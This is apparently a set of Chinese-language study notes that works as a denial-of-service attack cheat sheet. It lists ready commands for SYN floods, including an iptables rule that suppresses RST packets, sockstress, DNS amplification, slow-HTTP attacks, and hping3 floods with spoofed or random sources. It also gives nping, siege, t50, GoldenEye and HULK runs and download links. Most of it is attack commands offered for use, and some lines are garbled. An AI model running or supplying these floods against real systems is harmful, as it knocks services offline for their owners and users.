## Syn-Flood攻击 syn_flood.py攻击脚本（Linux下） ``` ./syn_flood.py -iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP -netstat -n I awk ‘/^ tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}‘ #Windows系统默认半开连接数10个,发一个包释放一个连接，这种达不到攻击郊果。 #要构成攻击效果可以通过iptables限止发送RST包。这样就可以达到攻击郊果。iptables写法如下： #iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.21.117 -j DROP ``` scapy工具（Linux下） ``` #安装scapy相关组件 apt-get install python-gnuplot #使用方法： – i=IP() 定义i变量（注意IP大小写，一定要大写） – i.display() 显示ip包头用法 – i.dst=“1.1.1.1” 目的地址 – t=TCP() 采用tcp协议发包 – t.display () 查看用法 – t.dport=3389 攻击远程3389端口 – sr1(i/t,verbose=1,timeout=3) 发送数据包（） – sr1(IP(dst=1.1.1.1)/TCP()) ``` windows下使用fastsend 验证：攻击之后可以用cmd命令 netstat -an查看效果 是否出现close-wait ## sockstress攻防 Python攻击脚本 ``` ./sicjstress.py 1.1.1.1 21 100 ``` C攻击脚本 ``` https://github.com/defuse/sockstress -gcc -Wall -c sockstress.c -gcc -pthread -o sockstress sockstress.o ``` ``` #直接攻击端口 ./sockstress 1.1.1.1:80 eth0 #攻击站点 ./sockstress 1.1.1.1:80 eth0 -p payloads/http #-d是微秒内指定，默认为1000000 改成10之后并发带度更快。 #添加防火墙规则 iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP ``` ## DNS放大攻击 kali中使用 digANYhp.com @202.106.0.20 (流量放大约8倍） 攻击原理 伪造源地址为被攻击目标地址，向递归域名查询服务器发起查询 DNS服务器成为流量放大和实施攻击者，大量DNS服务器实现DDoS ## 应用层攻击 低带宽应用层慢速DoS攻击 Slowhttptest，最早由Python编写，跨平台支持（Linux、win、Cygwin、OSX) 尤其擅长攻击apache、tomcat (几乎百发百中) 攻击方法 1. Slowloris 特点:完整的http请求结尾是\r\n\r\n，攻击发\r\n… 2. Slow HTTP POST Slow POST: HTTP头content-length声明长度，但body部分缓慢发送 3. Slow Read attack攻击 与slowloris and slow POST目的相同，都是耗尽应用的并发连接池 不同之处在于请求正常发送，但慢速读取响应数据 攻击者调整TCP window窗口大小，是服务器慢速返回数据 4. Apache Range Header attack 客户端传输大文件时，体积查过HTTP Body大小限制时进行分段 耗尽服务器CPU、内存资源 ## 其他拒绝服务攻击攻防总结 ### Kali自带拒绝服务攻击工具Hping3 几乎可以定制发送任何TCP/IP数据包，用于测试FW、端口扫描、性能测试 ``` Syn Flood 攻击 hping3 -c 1000 -d 120 -S -w 64 -p 80 - -flood - -rand-source 1.1.1.1 hping3 -S -P -U -p 80 - -flood - -rand-source 1.1.1.1 hping3 -SARFUP -p 80 - -flood - -rand-source 1.1.1.1 (TCP Flood) #ICMP Flood 攻击 hping3 -q -n -a 1.1.1.1 - -icmp -d 56 - -flood 1.1.1.2 #补充两个参数 --rand-source 用公网随机地址进行攻击 -a 1.1.1.1 伪造成1.1.1.1进行攻击 #详细帮助文档：http://cnhotfire.blog.51cto.com/2042323/698362/ #UDP Flood 攻击 hping3 -a 1.1.1.1 - -udp -s 53 -d 100 -p 53 - -flood 1.1.1.2 #LAND攻击，特殊种类的SYN Flood攻击，源地址、目的地址都是受害者，受害者于自己完成三次握手 hping3 -n –a 1.1.1.1 -S -d 100 -p 80 –flood 1.1.1.1 LAND攻者是伪造的源地址和要攻击目标地址是同一个地址，也就是说自己与自己建立连接。可用tcpdump –I eth0 –s 0 –vv查看 ``` ### TCP全链接DoS攻击nping ``` nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1 //--rate=100000 一次建10000个连接，-C是一共建1000000000连接。 #查公网IP -nping - -echo-client "public" echo.nmap.org - -udp ``` ### Siege http/https压力测试工具，模拟多个用户并发访问请求 —siege ``` siege -g http://1.1.1.1/a.php //扫描网站banner信息 siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp -vv ``` 同时攻击多个url，使用-f调用字典文件 /etc/siege/urls.txt,也可以直接 编辑urls.txt把要攻击的地址放进去直接使用siege –i –c 1000 -vv就可以攻击 Siege攻击一般用作并发量、性能测试，多用户并发访问测试。开发上线一般都会经过这步。 ``` siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp //10000用户并发， -A代表指纹信息，可随便填定。 ``` 一般用golden eye代替，后面有 ### T50网络压力测试 ``` t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80 t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22 ``` ### Nmap ``` grep dos /usr/share/nmap/scripts/script.db |cut -d “”" -f 2 ``` ### 其他拒绝服务攻击 * XOIC:https://xoicdoser.wordpress.com/ 攻击任意IP地址的指定端口 ``` git clone git://git.code.sf.net/p/xoic/code xoic-code #三种模式：test、normal、DoS Attack #支持协议：TCP/HTTP/UDP/ICMP ``` * DDOSIM 7层拒绝服务工具（模拟多个僵尸机） 随机IP地址 一基于TCP连接的攻击 -应用层DDoS攻击 正常的HTTP请求、非正常的HTTP请求式DDoS -SMTP DDoS 随机端口的TCP连接洪水 * GoldenEye http/https拒绝服务攻击工具 安全研究为目的Python脚本 随机攻击向量，keep-alive，避免缓存命中 ``` wget https://github.com/jseidl/GoldenEye/archive/master.zip unzip master.zip ./goldeneye.py http://1.1.1.1 -w 50 goldeneye.py http://1.1.1.1 -w 50 –m random //-w 50 代表50个人 ，-s 500代表每个人500个，50*500打25000个链接。 ``` * HULK:Python脚本 随机产生大量唯一的地址请求，避免缓存命中,耗尽WEB服务器资源池 https://packetstormsecurity.com/files/download/112856/hulk.zip * 匿名者攻击工具 匿名者发布的一些DoS工具 LOIC HOIC DDoSer